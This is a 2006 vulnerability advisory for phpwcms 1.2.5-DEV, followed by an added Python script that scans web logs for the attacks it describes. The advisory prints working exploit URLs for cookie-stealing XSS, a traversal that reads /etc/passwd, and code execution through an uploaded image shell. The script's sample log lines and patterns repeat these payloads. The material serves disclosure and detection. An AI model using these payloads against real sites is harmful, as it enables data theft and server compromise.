phpwcms multiple vulnerabilities

2006.05.24
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Vendor: http://www.phpwcms.de
Bugs: Path Disclosure, XSS, Local File Inclusion, Remote Code Execution
Vulnerable Version: phpwcms 1.2.5-DEV (prior versions may also be affected)
Exploitation: Remote with browser

Description:
--------------------
phpwcms is a web content management system optimized for fast and easy setup on any standard web server. phpwcms is perfect for professional, public and private users.

Vulnerability:
--------------------
-->>Path Disclosure<<--
Reason: Direct access to include files generates a PHP error that contains the installation path. Several files are vulnerable in this way.
Example:
http://example.com/phpwcms/include/inc_lib/files.public-userroot.inc.php
http://example.com/phpwcms/include/inc_lib/files.private.additions.inc.php

-->>XSS<<--
Reason: When register_globals is enabled, several template files are vulnerable to XSS.
Example:
http://localhost/php/phpwcms/include/inc_tmpl/content/cnt6.inc.php?BL[be_cnt_plainhtml]=<script>alert(document.cookie)</script>
Code Snippet:
/include/inc_tmpl/content/cnt6.inc.php
//line#28

    <?php echo $BL['be_cnt_plainhtml'] ?>

-->>Local File Inclusion<<--
Reason: Incorrect use of the spaw script (an external script) and its configuration results in local file inclusion when register_globals is enabled and magic_quotes_gpc is Off.
http://localhost/php/phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../../etc/passwd%00
Code Snippet:
/include/inc_ext/spaw/spaw_control.class.php
//lines:#15-20

    // Only values containing "://" are rejected; relative paths pass the check.
    if (preg_match("/:\/\//i", $spaw_root)) die ("can't include external file");
    include $spaw_root.'config/spaw_control.config.php';
    include $spaw_root.'class/util.class.php';
    include $spaw_root.'class/toolbars.class.php';
    include $spaw_root.'class/lang.class.php';

-->>Remote Code Execution<<--
Reason: An attacker can upload a picture with PHP code as EXIF metadata content in a post and then use the above vulnerability to achieve remote code execution.
Example:
http://example.com/phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../picture/upload/shell.jpg%00

Solution:
--------------------
Vendor has been contacted but we are not aware of any vendor supplied patch.

Original Advisories:
--------------------
http://www.kapda.ir/advisory-331.html
In Farsi: http://irannetjob.com/

Credit:
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]
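
Since no vendor patch is noted above, the request patterns in this advisory can be watched for in web server logs. The following is an added detection example, not part of the original advisory and not phpwcms code; the log lines are constructed, and the rule that *.inc.php and *.class.php files under /include/ are never requested directly is an assumption drawn from the advisory's examples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines for illustration; not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/May/2006:10:00:01 +0000] "GET /phpwcms/index.php?id=1 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [24/May/2006:10:00:02 +0000] "GET /phpwcms/include/inc_lib/files.public-userroot.inc.php HTTP/1.1" 200 310',
    '192.0.2.12 - - [24/May/2006:10:00:03 +0000] "GET /phpwcms/include/inc_tmpl/content/cnt6.inc.php?BL[be_cnt_plainhtml]=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 120',
    '192.0.2.13 - - [24/May/2006:10:00:04 +0000] "GET /phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../../etc/passwd%00 HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: *.inc.php / *.class.php under /include/ are include-only files.
INCLUDE_FILE = re.compile(r'/include/inc_\w+/.*\.(?:inc|class)\.php$')


def findings(line):
    """Return the sorted advisory-related labels that one log line matches."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not INCLUDE_FILE.search(url.path):
        return []
    hits = {"direct-include-access"}  # precondition for the path disclosure
    # parse_qsl percent-decodes values, so %00 becomes "\x00" here.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "spaw_root":
            hits.add("spaw_root-override")  # register_globals variable injection
            if ".." in value or "\x00" in value:
                hits.add("traversal-or-null-byte")
        if name.startswith("BL[") and re.search(r"[<>\"']", value):
            hits.add("markup-in-BL-parameter")
    return sorted(hits)


def scan(lines):
    """Map the client address of each flagged line to its findings."""
    flagged = {}
    for line in lines:
        hits = findings(line)
        if hits:
            flagged[line.split()[0]] = hits
    return flagged


if __name__ == "__main__":
    for client, labels in scan(SAMPLE_LOG).items():
        print(client, ", ".join(labels))
```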

